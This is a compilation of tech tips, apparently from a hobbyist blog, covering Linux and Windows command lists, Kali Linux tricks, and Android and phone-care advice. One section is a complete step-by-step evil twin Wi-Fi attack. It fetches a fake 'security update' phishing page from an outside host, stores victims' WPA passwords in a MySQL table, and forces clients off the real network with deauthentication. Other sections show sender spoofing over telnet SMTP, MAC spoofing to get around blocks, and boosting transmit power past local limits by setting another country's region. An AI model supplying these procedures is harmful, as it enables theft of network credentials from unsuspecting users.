pr – Prepare files for printing

printcap – Printer capability database

printenv – Print environment variables

printf – Format and print data

ps – Process status

pushd – Save and then change the current directory

pwd – Print Working Directory

From Q

quota – Display disk usage and limits

quotacheck – Scan a file system for disk usage

quotactl – Set disk quotas

From R

ram – ram disk device

rcp – Copy files between two machines

read – Read a line from standard input

readarray – Read from stdin into an array variable

readonly – Mark variables/functions as readonly

reboot – Reboot the system

rename – Rename files

renice – Alter priority of running processes

remsync – Synchronize remote files via email

return – Exit a shell function

rev – Reverse lines of a file

rm – Remove files

rmdir – Remove folder(s)

rsync – Remote file copy (Synchronize file trees)

From S

screen – Multiplex terminal, run remote shells via ssh

scp – Secure copy (remote file copy)

sdiff – Merge two files interactively

sed – Stream Editor

select – Accept keyboard input

seq – Print numeric sequences

set – Manipulate shell variables and functions

sftp – Secure File Transfer Program

shift – Shift positional parameters

shopt – Shell Options

shutdown – Shutdown or restart linux

sleep – Delay for a specified time

slocate – Find files

sort – Sort text files

source – Run commands from a file `.’

split – Split a file into fixed-size pieces

ssh – Secure Shell client (remote login program)

strace – Trace system calls and signals

su – Substitute user identity

sudo – Execute a command as another user

sum – Print a checksum for a file

suspend – Suspend execution of this shell

symlink – Make a new name for a file

sync – Synchronize data on disk with memory

From T

tail – Output the last part of file

tar – Tape ARchiver

tee – Redirect output to multiple files

test – Evaluate a conditional expression

time – Measure Program running time

times – User and system times

touch – Change file timestamps

top – List processes running on the system

traceroute – Trace Route to Host

trap – Run a command when a signal is set(bourne)

tr – Translate, squeeze, and/or delete characters

true – Do nothing, successfully

tsort – Topological sort

tty – Print filename of terminal on stdin

type – Describe a command

From U

ulimit – Limit user resources

umask – Users file creation mask

umount – Unmount a device

unalias – Remove an alias

uname – Print system information

unexpand – Convert spaces to tabs

uniq – Uniquify files

units – Convert units from one scale to another

unset – Remove variable or function names

unshar – Unpack shell archive scripts

until – Execute commands (until error)

uptime – Show uptime

useradd – Create new user account

userdel – Delete a user account

usermod – Modify user account

users – List users currently logged in

uuencode – Encode a binary file

uudecode – Decode a file created by uuencode

From V

v – Verbosely list directory contents (`ls -l -b’)

vdir – Verbosely list directory contents (`ls -l -b’)

vi – Text Editor

vmstat – Report virtual memory statistics

From W

wait – Wait for a process to complete

watch – Execute/display a program periodically

wc – Print byte, word, and line counts

whereis – Search the user’s $path, man pages and source files for a program

which – Search the user’s $path for a program file

while – Execute commands

who – Print all usernames currently logged in

whoami – Print the current user id and name (`id -un’)

wget – Retrieve web pages or files via HTTP, HTTPS or FTP

write – Send a message to another user

From X

xargs – Execute utility, passing constructed argument list(s)

xdg-open – Open a file or URL in the user’s preferred application.

yes – Print a string until interrupted

Hope this help you.
_________________________

CMD COMMAMDS FOR YOUR WINDOWS.

To Open CMD, you need to search for CMD in the Search box or you can simply press Windows Key + R that will eventually open the Run window,

where you need to type CMD and hit enter.

1. Accessibility Controls – access.cpl

2. Accessibility Wizard – accwiz

3. Add Hardware Wizard – hdwwiz.cpl

4. Add/Remove Programs – appwiz.cpl

5. Administrative Tools – control admintools

6. Automatic Updates – wuaucpl.cpl

7. Bluetooth Transfer Wizard – fsquirt

8. Calculator – calc

9. Certificate Manager – certmgr.msc

10. Character Map – charmap

11. Check Disk Utility – chkdsk

12. Clipboard Viewer – clipbrd

13. Command Prompt – cmd

14. Component Services – dcomcnfg

15. Computer Management – compmgmt.msc

16. Control Panel – control

17. Date and Time Properties – timedate.cpl

18. DDE Shares – ddeshare

19. Device Manager – devmgmt.msc

20. Direct X Troubleshooter – dxdiag

21. Disk Cleanup Utility – cleanmgr

22. Disk Defragment – dfrg.msc

23. Disk Management – diskmgmt.msc

24. Disk Partition Manager – diskpart

25. Display Properties – control desktop

26. Display Properties – desk.cpl

27. Dr. Watson System Troubleshooting Utility – drwtsn32

28. Driver Verifier Utility – verifier

29. Event Viewer – eventvwr.msc

30. Files and Settings Transfer Tool – migwiz

31. File Signature Verification Tool – sigverif

32. Findfast – findfast.cpl

33. Firefox – firefox

34. Folders Properties – control folders

35. Fonts – control fonts

36. Fonts Folder – fonts

37. Free Cell Card Game – freecell

38. Game Controllers – joy.cpl

39. Group Policy Editor (for xp professional) – gpedit.msc

40. Hearts Card Game – mshearts

41. Help and Support – helpctr

42. HyperTerminal – hypertrm

43. Iexpress Wizard – iexpress

44. Indexing Service – ciadv.msc

45. Internet Connection Wizard – icwconn1

46. Internet Explorer – iexplore

47. Internet Properties – inetcpl.cpl

48. Keyboard Properties – control keyboard

49. Local Security Settings – secpol.msc

50. Local Users and Groups – lusrmgr.msc

51. Logs You Out Of Windows – logoff

52. Malicious Software Removal Tool – mrt 53. Microsoft Chat – winchat

54. Microsoft Movie Maker – moviemk

55. Microsoft Paint – mspaint

56. Microsoft Syncronization Tool – mobsync

57. Minesweeper Game – winmine

58. Mouse Properties – control mouse

59. Mouse Properties – main.cpl

60. Netmeeting – conf

61. Network Connections – control netconnections

62. Network Connections – ncpa.cpl

63. Network Setup Wizard – netsetup.cpl

64. Notepad – notepad

65. Object Packager – packager

66. ODBC Data Source Administrator – odbccp32.cpl

67. On Screen Keyboard – osk

68. Outlook Express – msimn

69. Paint – pbrush

70. Password Properties – password.cpl

71. Performance Monitor – perfmon.msc

72. Performance Monitor – perfmon

73. Phone and Modem Options – telephon.cpl

74. Phone Dialer – dialer

75. Pinball Game – pinball

76. Power Configuration – powercfg.cpl

77. Printers and Faxes – control printers

78. Printers Folder – printers

79. Regional Settings – intl.cpl

80. Registry Editor – regedit

81. Registry Editor – regedit32

82. Remote Access Phonebook – rasphone

83. Remote Desktop – mstsc

84. Removable Storage – ntmsmgr.msc

85. Removable Storage Operator Requests – ntmsoprq.msc

86. Resultant Set of Policy (for xp professional) – rsop.msc

87. Scanners and Cameras – sticpl.cpl

88. Scheduled Tasks – control schedtasks

89. Security Center – wscui.cpl

90. Services – services.msc

91. Shared Folders – fsmgmt.msc

92. Shuts Down Windows – shutdown

93. Sounds and Audio – mmsys.cpl

94. Spider Solitare Card Game – spider

95. SQL Client Configuration – cliconfg

96. System Configuration Editor – sysedit

97. System Configuration Utility – msconfig

98. System Information – msinfo32

99. System Properties – sysdm.cpl

100. Task Manager – taskmgr

101. TCP Tester – tcptest

102. Telnet Client – telnet

103. User Account Management – nusrmgr.cpl

104. Utility Manager – utilman

105. Windows Address Book – wab

106. Windows Address Book Import Utility – wabmig

107. Windows Explorer – explorer.

108. Managing the Boot Configuration Data – bcdedit

109. Editing Boot Settings – bootcfg

110. Encrypting or Decrypting Files/folders – cipher

111. Clearing the screen – cls

112. Managing stored usernames/passwords – cmdkey

113. Changing CMD Color – color

114. Compressing one or more files – compress

115. Converting FAT drives to NTFS – convert

116. Delete files – del

117. Deleting User Profiles – delprof

118. Displaying the list of files and folders – dir

119. Displaying Message On Screen – echo

120. Deleting one or more files – erase

121. Opening the windows Explorer – explorer

122. Formatting a disk – format

123. Knowing file extension – ftype

124. Displaying the Mac Address – getmac

125. Online help – help

126. Displaying the host name – hostname

127. Editing disc label – label

128. Log a user off – logoff

129. Get a log time in a file – logtime

130. Creating .cab files – makecab

131. Creating new folders- md

132. Opening Windows Installer – msiexec

133. Managing the network resources – net

134. Knowing the permissions for a user – perms

135. Testing a network connecting – ping

136. Printing a text file – print

137. Shutdown computer – psshutdown

138. Checking free disk space – freedisk

139. Know the file and volume utilities – fsutil

140. File transfer protocl – ftp

141. Showing the space used in folders – diskuse

142. Deleting a folder and all subfolders – deltree

143. Importing or Exporting Active directory data – csvde

144. Displaying the resultant set of Policy information – gpresult

145. Updating the Group policy settings – gpupdate

146. Replacing the files that are currently in use by the os – inuse

147. Comparing two files – fc

148. Finding a text string in a file – find

149. Finding for a strings in file – findstr

150. Displaying the memory usage – mem

151. Remote desktop protocol – mstsc

152. Managing the domain – netdom

So, these are the best cmd commands. I hope these cmd commands will help you a lot.
_________________________

INCREASE WI-FI SIGNAL STRENGTH TX-POWER IN KALI LINUX.

1. Open up our terminal (see tutorial here how to create the shortcut) and type

ifconfig

and make sure your wireless network already detected and up.

2. Now let’s check our wireless card default tx-power by running this command

iwconfig wlan0

the default tx-power of my wireless card is 20 dBm.

3. When we check the default signal quality through wavemon,

4. To change the tx-power we must turn off our wireless interface by running

ifconfig wlan0 down

and then change the regional to BO (Bolivia) which in that country they allow the use of 1000 mW tx-power

iw reg set BO

turn on the wireless interface again

ifconfig wlan0 up

5. Now we can check again our wireless card status by running

iwconfig wlan0

if the tx-power already changed, let’s check our wavemon, and see the difference.

6. We can set up our wireless card into specific channel by running

iwconfig wlan0 channel 8

or we can also directly change the tx-power using this command

iwconfig wlan0 txpower 30

Conclusions:

>> Some problems may occur when we set higher than default tx-rate; such as:

overheating of the power amplifier chip and the card which will cause lower efficiency and more data errors;

overdriving the amplifier which will cause more data errors;

excessive power usage for the card and this may overload the default power supply of the board that the card is located on resulting in voltage drop and reboot or excessive temperatures for the board.
_________________________

HOW TO CREATE KEYBOARD SHORTCUTS ON KALI LINUX?

If the case is you only want to run a terminal,

you can try to press ALT + F2 and type:

gnome-terminal

1. First go to

Applications –> System tools –> Preferences –> System Settings

2. On the System settings, find hardware group and choose keyboard

3. Choose and click shortcuts tab, and press the plus + sign at the bottom to add a new shortcut.

4. Put the name(use the name that easy to recognize) and the command (in this case it is a terminal)

5. Click the disabled area until it change the words to New accelerator.

6. Now you can choose which shortcut you want for your Kali Linux.

In this example we use CTRL + ALT + T to call the terminal.

We can directly try our new kali linux keyboard settings.
_________________________

SPLIT KALI LINUX TERMINAL WINDOWS.

Step by step how to Split Kali Linux Terminal Window:

1. In this tips and trick we will utilize screen. As the manual page says:

Screen is a full-screen window manager that multiplexes a physical terminal between several processes (typically interactive shells).

2. Type screen in the terminal.

press ENTER to skip and then continue to next step.

3. To vertically divide the terminal

press CTRL + A and then press | (pipe) sign

4. To horizontally divide the terminal

press CTRL + A and then press SHIFT + S

5. To move between the window

press CTRL + A and then press TAB

6. To activate the window

press CTRL + A and then press C

FInally in the end here is the result I’ve made

Conclusion:

1. You can make your own and you can create which one the most comfortable layout for you.

2. To divide the window it’s depend with the active cursor position in which window.

3. You can share your screen window here and opinion why you use that layout.
_________________________

HOW TO SEND EMAIL ON TELNET IN KALI LINUX?

I think everyone already know how to send an email especially the conventional email,

that is why I made this tutorial about how to send email using telnet in kali linux.

The way we sending email in this tutorial is a little different than sending email using Gmail or Yahoo,

because we will try to sending email by using a command prompt or terminal.

Do not confused with the title How to send email using telnet in kali linux,

because the telnet protocol was same for all operating system.

Step by step how to send email using telnet:

Below is the information I will use in this tips and trick:

SMTP server address: mail.spyboy.lan

SMTP server IP address: 192.168.160.174

SMTP port: 53

1. In this tips and trick, the case is we are inside the ISP network. Let me show you the network topology where we do this.

We will do from client 1 because from this client we can send email anonymously.

2. From the intro we know that SMTP use port 25. Open the terminal or command prompt.

and run the telnet command to connect to the mail server.

telnet mail.spyboy.lan 25

or

telnet 192.168.160.174 25

25 is the SMTP port, most of email server use this port to sending email.

3. Yes we can connect to that mail server(message 220). Now let’s greet this mail server.

HELO mail.spyboy.lan

After we greet the mail server, we need to make sure that the server replying 250 or OK

4. After get reply message 250 from the mail server, we can start define the email sender and email recipient.

MAIL FROM: Spyboy@shubhamkumar.lan

if the sender was OK, it should replied 250.

The next step is create the recipient.

RCPT TO: v4l@spyboy.com

This recipient also should return the 250 message or OK

5. If email sender and email recipient already OK, we can compose the message. type DATA and press enter

DATA

then create the subject of our email.

SUBJECT: Hi v4L, this is spyboyblog.wordpress.com and continue with the email body content…

to end the message, put the only dot (.) in a single line and press enter,

it mean that we already finish composing the message and ready to send it.

6. The picture in step 5 shows an error, because I only use a dummy local SMTP and I’m a little lazy to configure it 🙂

But in this step if you success to send the email, the server will reply a message ‘Message accepted for delivery’.

7. To quit the telnet, just type QUIT

QUIT

Conclusions:

1. Usually this method used by spammer to sending mass/bulk email since there is no authentication.

2. When you use the fake sender email address(the mail server not recognize the address), your email will go to spam folder.

3. The client 2 (see the topology) cannot send email by using the SMTP, because they outside the ISP local network,

but if client 2 can own the client 1 PC, he also can send the email 🙂
_________________________

HOW YO CHANGE MAC ADDRESS ON KALI LINUX?

Changing MAC address or we also can call it MAC address spoofing will be useful in some cases, but we will talk about it later in conclusion at the end of this article.

Requirement:

1. Linux terminal

Step by step How to Change MAC Address on Kali Linux:

1. Open your terminal, and type

ifconfig | grep HWaddr

you will see your original MAC address, mine was 08:00:27:b2:4d:4b

2. To temporary change our MAC address, we need to turn off the network interface first by running this command

ifconfig eth0 down

3. After that we can configure the new MAC address

ifconfig eth0 hw ether 00:00:00:00:00:02

you can change the MAC address using this hexadecimal format XX:XX:XX:XX:XX:XX

4. Now we can turn on the network interface again.

ifconfig eth0 up

5. And the last we can check again our MAC whether it’s change or not.

if we follow until this step, MAC address will back to default after we restart our machine. Go to next page to view how to change MAC address permanently.

6. Kali Linux was built based on Debian. In Debian all the network interface was located on /etc/network/interfaces.

7. We will configure the /etc/network/interfaces. In this tutorial I will use pico text editor, but you can choose any of your favourite text editor.

pico /etc/network/interfaces

8. Now we will add one line of script to change our MAC address permanently

pre-up ifconfig eth0 hw ether 00:00:00:00:00:02

This script will be called on system startup.

9. If we want to restore the default MAC address, just add the # sign in front of script in step 8.

#pre-up ifconfig eth0 hw ether 00:00:00:00:00:02

Conclusion:

1. Changing MAC address usually needed for privacy and prevent tracking in the local network about our hardware information(e.g: in public wi-fi network).

2. Some network administrator they make blocking rule in proxy or router by adding the MAC address. To ensure interoperability and preventing being blocked by the proxy or router blacklist rule, we can change our MAC address.

Hope you found it useful.
_________________________

HOW TO CREATE BOOTABLE USB KALI LINUX ON WINDOWS?

I believe most of you maybe already know how to create a bootable usb, but let me do some enlightenment for they who haven’t know how to create bootable usb kali linux on Windows.

We can use this method not only for kali linux, but we also can create a bootable usb for backtrack linux, ubuntu, debian, etc…

Requirements:

1. USB Stick.n\n 2. USB Installer (Download it)

Step by step how to Create Bootable USB Kali Linux on Windows:

1. Download the USB Installer from the link above, and double click, it is a standalone executable file. Plug the USB we want to use to create the bootable usb.

2. On the USB installer window

Create Bootable USB Kali Linux

Step 1: Choose which linux distro or O.S we want to put on our USB

Step 2: Locate the .ISO file of our O.S we want to put on our USB

Step 3: Select the USB drive letter. Make sure you don’t choose your external harddisk 🙂 check the format drive to make sure we clean up all the content of our USB

Click Create

3. A pop up alert window will appear. Make sure we check again if there’s something wrong or missing. Click Yes to start the bootable usb creation process.

Create Bootable USB Kali Linux

4. Now we need to wait for the application to accomplish the tasks. The time taken is depend with which distro or O.S we want to create.

Create Bootable USB Kali Linux

When finished, just click Close and our USB was ready to boot.

5. Now we will continue to set up the boot order from our computer BIOS to USB. The picture below was taken from my Acer Aspire one netbook.

Create Bootable USB Kali Linux

you can press F2 to go to BIOS setup or F12 to change the boot device.

6. If we choose F12, here is the preview on my netbook

Create Bootable USB Kali Linux

Change the USB HDD order into number one to boot from the USB.

7. If we choose F2 or edit from BIOS setup.

Create Bootable USB Kali Linux

We must change the boot priority order and make sure the USB HDD / flash disk is in order number one.

NOte:

Make sure your USB storage size is more than or equal 4 GB, more is better than less

Hope it’s useful
_________________________

HOW TO ENABKE THE NETWORK IN KALI LINUX VIRTUAL BOX?

How to enable the network in Kali Linux Virtual Box, I brought this simple tips and trick, because some users asking about it, because by default some of the Virtual Box when you try to connect to the internet maybe it can’t.

Step by step enable the network in Kali Linux:

1. Open your Kali Linux Virtual Box like this. Click “Devices” menu and choose “Network Adapters“.

2. Now the new window to set up the Kali Linux Virtual Box will open.

3. By default the network adapter is attached to NAT. You need to change it to Bridged adapter.

4. The next step you need to choose which network interface you want to bridged to. If your network interface have more than one (e.g: 2 LAN port, 1 wireless, etc) it will show here. Just choose which network interface you want to bridged to. Because the one connected to internet is my wireless card, then I choose wireless network adapter.

5. After I make the change, I get the IP address directly from the network not from the Virtual Box adapter.

Notes : Your default wireless network cannot be used while you are using Virtual Box. If you want to use wireless network in your Virtual Box, you can use the wireless usb card, then the virtual machine can detect it.

Hope you found it useful
_________________________

HIW TO CREATE EVIL TWIN ACCESS POINT?

Today we will learn How to create Evil Twin Access Point.

Requirements:

1. Kali Linux

2. Wireless network adapter[I em using TP-link TL-WN821N]

3. Internet connection to your machine

4. Target Access point

What is Evil twin access point??

An evil twin, in security, is a rogue wireless access point that masquerades as a Wi-Fi access point so that an attacker can gather personal information without the user’s knowledge.

To the user, the evil twin looks like a hotspot with a strong signal; that’s because the attacker has not only used the same network name and settings as the ‘good twin’ he is impersonating, he has also physically positioned himself near the end-user so that his signal is likely to be the strongest within range.

If the end-user is tempted by the strong signal and connects manually to the evil twin to access the Internet, or if the user’s computer automatically chooses that connection because it is running in promiscuous mode, the evil twin becomes the user’s Internet access point, giving the attacker the ability to intercept sensitive data such as passwords.

So let’s get started with the tutorial for creating an evil twin access point..

Step by step How to Create Evil Twin Access Point

Step 1:n
Login to your kali linux machine..

Establish an internet connection to your host machine..

Now we have to install DHCP server as follows..

Open the terminal and type apt-get install dhcp3-server

Step 2:

Now we need to configure our DHCP server

Open your terminal and type nano/etc/dhcpd.conf, you should have a blank file opened up on your terminal..

Now type the following code shown below

authoritative;
default-lease-time 600;
max-lease-time 600;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.129;
option domain-name-server 8.8.8.8;
range 192.168.1.130.192.168.1.140;
}

After typing press ctrl+x and then press y and hit enter to save it.

Step 3:

Now download the security update page which the client will see when they open up the web browser..

To do that,

Navigate to, cd /var/www in your terminal and do as follows:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

Step 4:

Now type the following to start your apache server and mysql:

/etc/init.d/apache2 start

/etc/init.d/mysql start

Now the mysql is loaded now we have to create a database where we store the WPA/WPA2 password that the client enters into the security update page..

Type the follows:

mysql -u root

create database evil_twin;

use evil_twin

create table wpa_keys(password varchar(64), confirm varchar(64));

Step 5:

Now we need to find our local network adapter interface name and our local ip

Now open the new terminal and type:

ip route (take note of local ip n wired interface)

airmon-ng

airmon-ng start wlan0

clear

NOTE: spyboy is my interface name and 192.168.0.105 is my local ip

airodump-ng-oui-update

airodump-ng -M mon0 (take note of target essid,bssid and channel number)

airbase-ng -e [ESSID] -c [ch. #] -P mon0

NOTE: [ESSID] is your targets ESSID and [ch. #] targets channel no.

Step 6:

Our evil twin access point is now up and running, we need to configure our tunnel interface so we can create a bridge between our evil twin access point and our wired interface and our tunnel interface is named at0, which was created when we created evil twin access point using airbase..

Don’t close airbase and mysql terminal..

Now open a new terminal and type as follows:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

now we need to add a routing table to enable IP forwarding so we can forward traffic to and fro from our evil twin access point..

so,type the following:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

etc/init.d/isc-dhcp-server start

Step 7:

Now we need to force our clients to connect to our evil twin access point and to accomplish this we need to disconnect the clients by performing the de-authentication attack. To do that first we need to create the blacklist file that contains BSSID of the target..

Do as follows :

echo [BSSID] > blacklist

NOTE:[BSSID] BSSID of the target

mdk3 mon0 d -b blacklist -c [CH.#]

How to Create Evil Twin Access Point

Now go back to airbase terminal to check if any client has connected to your evil twin access point..

If he is connected to the evil twin access point he will see the security page as shown below which asks for password..

Where the client enters his WPA/WPA2 password and clicks on update.

Now go over to the mysql terminal and type

use evil_twin

select * from wpa_keys; {To view the password entered by the victim in our mysql database}

So that’s it, that’s how you create an evil twin access point..

This tutorial is only for educational purpose!!

Hope you found it useful
_________________________

LINUX BASICS FOR THE NOOB HACKERS.

A number of you have written me regarding which operating system is best for hacking.

I’ll start by saying that nearly every professional and expert hacker uses Linux or Unix.

Although some hacks can be done with Windows and Mac OS, nearly all of the hacking tools are developed specifically for Linux.

There are some exceptions, though, including software like Cain and Abel, Havij, Zenmap, and Metasploit that are developed or ported for Windows.

When these Linux apps are developed in Linux and then ported over to Windows, they often lose some of their capabilities. In addition, there are capabilities built into Linux that simply are not available in Windows. That is why hacker tools are in most cases ONLY developed for Linux.

To summarize, to be a real expert hacker, you should master a few Linux skills and work from a Linux distribution like BackTrack or Kali.

For those of you who’ve never used Linux, I dedicate this series on the basics of Linux with an emphasis on the skills you need for hacking. So, let’s open up BackTrack or your other Linux distribution and let me show you a few things.

STEP 1.
Boot Up Linux
Once you’ve booted up BackTrack, logged in as ‘root’ and then type:

bt > startx

You should have a screen that looks similar to this.

STEP 2.
Open a Terminal
To become proficient in Linux, you MUST master the terminal. Many things can be done now in the various Linux distributions by simply pointing and clicking, similar to Windows or Mac OS, but the expert hacker must know how to use the terminal to run most of the hacking tools.

So, let’s open a terminal by clicking on the terminal icon on the bottom bar. That should give us a screen that looks similar to this.

If you’ve ever used the command prompt in Windows, the Linux terminal is similar, but far more powerful. Unlike the Windows command prompt, you can do EVERYTHING in Linux from the terminal and control it more precisely than in Windows.

It’s important to keep in mind that unlike Windows, Linux is case-sensitive. This means that Desktop is different from desktop which is different from DeskTop. Those who are new to Linux often find this challenging, so try to keep this in mind.

STEP 3.
Examine the Directory Structure Let’s start with some basic Linux. Many beginners get tripped up by the structure of the file system in Linux. Unlike Windows, Linux’s file system is not linked to a physical drive like in Windows, so we don’t have a c: at the beginning of our Linux file system, but rather a /.

The forward slash (/) represents the root of the file system or the very top of the file system. All other directories (folders) are beneath this directory just like folders and sub-folders are beneath the c: drive.

It’s important to have a basic understanding of this file structure because often we need to navigate through it from the terminal without the use of a graphical tool like Windows Explorer.

A couple key things to note in this graphical representation:

The /bin directory is where binaries are stored. These are the programs that make Linux run.

/etc is generally where the configuration files are stored. In Linux, nearly everything is configured with a text file that is stored under /etc.

/dev directory holds device files, similar to Windows device drivers.

/var is generally where log files, among other files, are stored.

STEP 4.
Using Pwd

When we open a terminal in BackTrack, the default directory we’re in is our home directory. As you can see from the graphic above, it’s to the right of the root directory or one level below root. We can confirm what directory we are in by typing:

bt > pwd

pwd stands for present working directory and as you can see, it returns ‘/root’ meaning we’re in the root users directory (don’t confuse this with the top of the directory tree root. This is the root users directory).

STEP 5.
Using Cd Command

We can change the directory we’re working in by using the cd (change directory) command. In this case, let’s navigate up to the top of the directory structure by typing:

bt > cd ..

The cd command followed by the double dots (..) says, move me up one level in the directory tree. Notice that our command prompt has changed and when we type pwd we see that Linux responds by telling us we are in the ‘/’ or the top of the directory tree (or the root directory).

bt > pwd

STEP 6.
Using the Whoami Command

In our last lesson of this tutorial, we’ll use the whoami command. This command will return the name of the user we’re logged in as. Since we’re the root user, we can log in to any user account and that user’s name would be displayed here.

bt > whoami

That’s it for now. In the next several tutorials, I will continue to give you the basics of Linux that you’ll need to be a pro hacker.
______

USEFUL ANDROID TIPS AND TRICKS,YOU SHOULD KNOW.

1. Disable App Notifications

Bugged by annoying app notifications that just keep coming? If you don’t know already, these app notifications also drain your phone’s battery.

If you want to turn them off, and you are on Jelly Bean 4.1 and above, here’s how:

On any of your unwanted notifications in your notification bar, long press on the notification for a message box to appear.

Tap on App Info > Untick Show Notifications > OK.

2. Disable Mobile Data

Whenever you don’t need to stay connected, disabling the Mobile Data can help keep your smartphone battery from draining too quickly.

Turning off mobile data is as easy as:

Going to Settings > Data Usage.

Disable Mobile data by toggling the setting from ON to OFF.

3. Set Mobile Data Limit

Want to keep track of how far your usage is from your monthly mobile data limit? If you have ICS and above, there is a feature which lets you keep track of how much of the quota you have left.

Head over to Settings > Data Usage.

Set your data limit by dragging the orange line to reflect your monthly quota.

Set your data usage cycle based on when your “month” starts and ends, and you’re done.

You will be alerted once you hit the limit you have set.

Note that the tracked data usage of your phone may vary slightly than your carrier’s tracking.

4. Add Multiple Google Accounts

You need a Google account to use an Android phone but did you know you can choose to run more than one Google account on your Android device.

This is convenient if you use more than one account for several of your Google services. To add multiple Google accounts:

Go to Settings > Add account.

Select Google and setup your New or Existing Google account.

Once added, choose what you want to sync with the account.

Repeat all the steps above if you want to add more accounts.

5. Disable automatic App Updates

Prefer to read through app permissions and manually pick which app updates to adopt? You can, but first you need to disable your automatic app updates.

Here are the steps:

Open Play Store and head over to Settings.

Tap on Auto-update apps.

Choose Do not auto-update apps.

If you want to enable the auto updates, follow the same path and choose Auto-update apps at any time or via Wi-Fi (available for certain Android devices only).

6. How To Check For android System updates

For Android users that are using stock ROM, you may want to look for new updates to your system. To check for updates:

Go to Settings > About phone/tablet.

Tap on System updates.

Tap Check now to look for system updates.

7. Changing Default Apps

If you have already set some default apps for particular tasks (e.g. using Chrome for opening web links) but wish to change this:

Go to Settings > Apps.

Swipe right and look for the All tab.

Select the app you want to remove as default.

Tap on Clear defaults.

8. How to Turn Off Auto-Correction

Hate the fact that your phone is going English teacher mode on you? Turn off auto-correction for peace of mind when texting.

Go to Settings > Language & input.

Tap on the settings icon next to the keyboard that you are using, e.g. Google Keyboard.

Look for Auto-correction and tap on it.

Select Off to turn auto-correction off.
_________________________

ALWAYS ON OR AMBIENT DISPLAY: WHAT IS IT?

Always On is a feature that allows your device to always be displaying information about the current time, date, battery, weather and notifications without unlocking the screen.

Introduced on the Samsung Galaxy S7, S7 Edge and LG G5, it makes life easier for those who can’t keep themselves from turning the display on constantly, looking for new notifications, unlocking it every time and thus draining their battery.

Ambient Display has the same function, however, it is triggered by movement, using the proximity sensor of the smartphone as the main trigger. Motorola calls this Moto Display.

The following app is particularly suited for devices that have AMOLED screens but are nonetheless without an Always On or Ambient Display display feature.

Other devices which don’t have an Always On feature may not have it for a good reason: If your device has an LCD screen, being ‘always on’ would consume much more battery life because the display will be fully powered on, including the black pixels.

With AMOLED display technology, only the white pixels need to be lit.

Also, apps like these may cause battery drainage not just from powering the display, but by keeping your phone from going into standby mode, meaning some background processes will keep ticking on unnecessarily.

>> Always On AMOLED – BETA

Taking advantage of the proximity sensor of your device, the app Always On AMOLED will allow you to check the time, weather forecast, notifications and all sorts of useful information without unlocking the screen.

That means it’s a mix between Always On and Ambient Display.

Once you’ve installed the app, you’ll find yourself in the Settings menu which will allow you to customize every detail: from the font of the time displayed and the calendar, to the position of the information you specify on the screen, to the size and color of the text.

You decide, by switching it on or off, whether to show notifications for calls and unread messages, by which apps you want to be notified, whether to display battery-related information, the alarm clock and weather forecast.

Among the other items that you can manage, you can set the brightness level and screen timeout.

Download here :

https://play.google.com/store/apps/details?id=com.tomer.alwayson_________________________

HOW TO FIX A WATER DAMAGED PHONE IN EASY STEPS?

1. Turn it off if, it isn’t already and hold it upright.

2. Remove any protective casing and, if your phone has them, remove your SIM and microSD cards from their slots.

3. Open up the back and remove the battery, SIM card(s) and microSD card if you are able to (note that this won’t be possible with all phone models).

4. Use a cloth, sleeve or paper towel to dab your phone dry. Avoid spreading the liquid around, because that could push it into more of the phone’s openings.

Just soak up as much as possible.

5. If the water damage is more extensive, you can use a vacuum to carefully suck out water stuck from the cracks that are harder to get at.

Make sure any small parts, such as the microSD card, SIM card, or battery, are out of the way before attempting this.

6. Bury the phone in a ziplock bag full of uncooked rice. Rice is great for absorbing liquid and this is actually a common method for drying smartphones and tablets.

You can also buy dedicated phone drying pouches, which are worth having at home if you’re the clumsy type.

If you don’t have one at home, don’t bother going out to buy one. Indeed, time is of essence, so get your phone into rice as soon as possible.

7. Let your phone dry for a day or two. Do not be tempted to switch it on see if it still works.

Put your SIM card in an old phone, or ask a friend or family if they have a spare that you can borrow.

8. After a couple of days, you can remove the phone from the rice back, insert the battery into the phone and switch the phone on.

9. If your phone doesn’t turn on, try charging it. If it doesn’t charge, the battery may be damaged.

You could try a replacement battery, or consider taking your smartphone to a repair shop to be checked by a professional.

10. If your phone has turned on and it is running as it should, you should still keep a close eye on it for the next few days, to see if you notice anything out of the ordinary.

Play some music to check the speakers and ensure the touch screen still responds as it should.

>> What not to do

Do not turn it on

Do not press any buttons or keys

Do not shake, tap or bang the phone

Do not blow on it. This could send water into other internal parts of the phone that it hadn’t already reached, causing more damage in the process

Do not heat it up (that includes using a blow dryer or microwaving it)
_________________________

SIMPLE TIPS TO SPEED UP YOUR PHONES.

Your Android phone was probably fast when you first bought it, right? Then over time it began running more slowly.

This is a common problem and nothing to worry about.

Below is our guide to getting your phone fast again. Read on for our best tips to speed up your phone.

1. Identify the problem

The first thing to do is find out what is causing the problem: an app, multiple apps, the system itself?

Trepn Profiler by Qualcomm will show you the real-time CPU load for individual cores, an overview of network traffic for both data and Wi-Fi, GPU loads and RAM usage and more.

2. Free up some space

All those photos you’ve taken and all of those apps you’ve installed can take their toll on your phone.

It needs a little breathing room to run smoothly and if it’s running low on space, it can start to slow down.

You can check how much space you have left by heading to the Storage section of Settings.

One of the easiest ways to free up space is to tap Applications and see which apps you can uninstall.

3. Cut back on the widgets

All those widgets you have running on your home screen may be useful, but they also take up their fair share of resources.

If you have any widgets running that you don’t really need, consider disabling them. There’s no harm in having some active, but you will notice an element of slow-down if you have too many running at the same time, so just be a little selective.

4. Disable unnecessary animations and extras

Depending on the launcher you are using, you may find that there are various animations and special effects in place.

These may look great, but they can also slow things down.

Check in your launcher’s settings to see if there is a way to disable any of these unnecessary extras, and you could earn yourself a speed boost.

5. Close down apps and free up RAM

Multi-tasking several apps makes it easy to switch between different tools, but there can also be an impact on performance.

You can quickly close down any apps you are no longer using by calling up the running apps list – press and hold the home key and then swipe away any apps you want to exit.

While you are at this screen, tap the pie chart button to the lower right of the screen and then move to the RAM section.

